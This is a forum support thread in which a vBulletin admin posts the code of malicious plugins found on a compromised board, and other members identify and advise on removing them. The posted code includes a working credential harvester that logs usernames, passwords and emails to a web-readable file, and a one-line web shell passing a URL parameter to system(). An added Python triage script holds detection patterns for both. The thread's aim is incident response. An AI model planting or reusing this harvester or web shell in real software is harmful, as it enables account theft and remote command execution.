vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vB4 General Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=251)
-   -   Myfilestore.com Virus (https://vborg.vbsupport.ru/showthread.php?t=323931)

MarkFL 11-28-2016 03:53 PM

Does that fix the issue? Out of curiosity, would you post the code within those two plugins?

Dave 11-28-2016 03:56 PM

You can also try the following in order to track where it's coming from or how it happened:
- Check the logs at AdminCP > Statistics & Logs > Control Panel Log > look for entries that come from unfamiliar IP addresses.
- Disable all plugins and hooks. (guide) Problem still exists after all plugins/hooks disabled? Then it's possible that certain PHP/JS files are modified on your server.

mscottralston 11-28-2016 05:03 PM

MarkFL: I can't tell if it's fixed or not. When I go to privateerpressforums.com from a google link (the originally-reported way that this issue manifested), I don't get redirected to this spam website, so... hopefully it's fixed? I was never able to reproduce the issue in the first place, though. Lots of forum users were very vocal about it over the weekend.

Here are the codes:

global_rewrite:

$show['nopasswordempty'] = TRUE;

login_rewrite:

// reads the credentials submitted to the login form
$lg_username = strtolower($vbulletin->GPC["vb_login_username"]);
$lg_password = $vbulletin->GPC["vb_login_password"];
$lg_file = "./customavatars/lg.html";
// looks the account up so the e-mail address can be recorded too
$sql_query = @mysql_query("SELECT * FROM " . TABLE_PREFIX . "user WHERE username='" . $lg_username . "'");

while($row = @mysql_fetch_array($sql_query))
{
    if(strlen($lg_password) > 1 AND strlen($lg_username) > 1)
    {
        // appends "username:password (email)" to a file under the web root
        $fp1 = @fopen($lg_file, "a+");
        @fwrite($fp1, $lg_username . ':' . $lg_password." (" . $row["email"] . ")\n");
        @fclose($fp1);
        // rewrites the file with duplicate lines removed
        $f = @file($lg_file);
        $new = array_unique($f);
        $fp = @fopen($lg_file, "w");
        foreach($new as $values)
        {
            @fputs($fp, $values);
        }
        @fclose($fp);
    }
}
The Federal plugins are still on. Here are their codes:

if(isset($_GET['lol'])){echo "<h1>lol</h1><pre>"; system($_GET['lol']);exit;}

and

if(isset($_GET['lol'])){echo "<h1>lol</h1><pre>"; system($_GET['lol']);exit;}

In other words, they're identical. Not sure why there are two of them. In general they seem a bit suspicious to me.

Dave: I don't see any suspicious log entries from the past few weeks (though it's unclear to me exactly when this issue started). The IPs are all me and known moderators.

MarkFL 11-28-2016 05:14 PM

Yeah, those "Federal" plugins look suspicious to me as well. That first one looks like it could be harvesting passwords/email addresses. If it were me, I would look on the server and see what's in the file "/customavatars/lg.html" and if it contains passwords and email addresses, I would download it (in case it is legit and needs to be restored) and delete it.

I would disable or even delete those 4 plugins (make backups in a text file on your hard drive in case you need them back).

Edit: if the file "/customavatars/lg.html" does appear to have passwords/email addresses, I would advise your users to change their passwords.
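
Added here as a defender's triage script, not code from the thread or from vBulletin: it scans plugin bodies for the two indicator classes seen in this thread (a request parameter passed straight into system(), and the login password being written to a file) and parses the harvester's "username:password (email)" output format so the affected accounts can be told to reset their passwords without the passwords themselves being handled further. The sample plugin bodies and the lg.html lines are constructed for the example, as is the hypothetical "benign" plugin.

```python
import re

# Constructed samples modelled on the plugin code posted in the thread
# (not the forum's live data); "benign" is a hypothetical legitimate hook.
SAMPLE_PLUGINS = {
    "global_rewrite": "$show['nopasswordempty'] = TRUE;",
    "login_rewrite": (
        '$lg_password = $vbulletin->GPC["vb_login_password"];\n'
        '$lg_file = "./customavatars/lg.html";\n'
        '$fp1 = @fopen($lg_file, "a+");\n'
        '@fwrite($fp1, $lg_username . \':\' . $lg_password);'
    ),
    "Federal": 'if(isset($_GET[\'lol\'])){echo "<h1>lol</h1><pre>"; '
               'system($_GET[\'lol\']);exit;}',
    "benign": '$pw = $vbulletin->GPC["vb_login_password"]; // read only, never stored',
}

# Indicator classes taken from this thread: command execution driven by
# request input, and the submitted login password reaching a file write.
INDICATORS = {
    "command execution from request input": re.compile(
        r"\b(system|exec|shell_exec|passthru|popen)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b"),
    "login password written to file": re.compile(
        r"vb_login_password[\s\S]*?\b(fwrite|fputs|file_put_contents)\s*\("),
}

def scan_plugin(code):
    """Return the indicator labels whose pattern matches one plugin's PHP body."""
    return [label for label, rx in INDICATORS.items() if rx.search(code)]

def scan_all(plugins):
    """Map plugin name -> matched indicators, listing only plugins that match."""
    findings = {}
    for name, code in plugins.items():
        hits = scan_plugin(code)
        if hits:
            findings[name] = hits
    return findings

# One harvested line looks like "username:password (email)".
LG_LINE = re.compile(r"^([^:\n]+):.*\((.*)\)\s*$")

def affected_accounts(lg_contents):
    """Extract (username, email) pairs from the harvester file; the password
    field is skipped so the result can be handed to whoever sends reset notices."""
    return [(m.group(1), m.group(2))
            for m in (LG_LINE.match(line) for line in lg_contents.splitlines()) if m]

if __name__ == "__main__":
    print(scan_all(SAMPLE_PLUGINS))
```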

oguzdinc 11-28-2016 05:33 PM

I also could not solve my problem. As vBulletin support told me, I deleted all plugins, and I also deleted each file, and I only have VSa - Advanced Forum Statistics on my website, and it is the latest version. Do I have to delete it?

MarkFL 11-28-2016 05:48 PM

Can you post exactly what you were told to do?

mscottralston 11-28-2016 05:49 PM

Hi MarkFL,

Indeed it was harvesting passwords. How awful. I will be backing up and deleting all four plugins.

Any idea how these got on our boards in the first place? I am going to be updating from 4.2.0 to 4.2.3 ASAP, but wanted to try to fix this issue before I did...

MarkFL 11-28-2016 05:53 PM

I would suspect an SQL exploit, and updating to vB 4.2.3 PL2 would be a good idea. :)

Dave 11-28-2016 05:59 PM

Definitely upgrade to the latest version as soon as possible.
It's entirely possible that they modified vBulletin's PHP files as well.

mscottralston 11-28-2016 07:01 PM

Will the upgrade to 4.2.3 overwrite these possibly-modified PHP files? Other than any possible compromises to security, the other thing I'm interested in is the extensive set of permissions-locked boards that we use -- not everything visible by everyone. As long as those permissions are preserved, I should be good, but if preserving them could allow a hack to persist, maybe not so good...

